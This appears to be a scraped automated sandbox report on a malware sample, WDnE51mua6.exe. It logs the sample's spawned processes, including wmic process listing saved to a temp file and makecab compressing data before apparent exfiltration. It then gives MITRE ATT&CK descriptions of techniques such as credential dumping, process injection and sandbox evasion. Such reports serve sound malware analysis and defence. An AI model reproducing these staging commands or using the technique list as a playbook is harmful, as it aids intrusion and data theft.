Commandline:	cmd.exe /C wmic process get Name > 'C:\Users\user\AppData\Local\Temp\chr1073.tmp'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6324 Parent PID: 6308

General

Start time:	10:51:52
Start date:	08/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: WMIC.exe PID: 580 Parent PID: 6308

General

Start time:	10:51:53
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic process get Name
Imagebase:	0xf10000
File size:	391680 bytes
MD5 hash:	79A01FCD1C8166C5642F37D1E0FB7BA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 3624 Parent PID: 6552

General

Start time:	10:51:57
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 4188 Parent PID: 3624

General

Start time:	10:51:57
Start date:	08/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: makecab.exe PID: 5036 Parent PID: 3624

General

Start time:	10:51:57
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\makecab.exe
Wow64 process (32bit):	true
Commandline:	makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp'
Imagebase:	0x1360000
File size:	68608 bytes
MD5 hash:	D0D74264402D9F402615F22258330EC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report WDnE51mua6.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre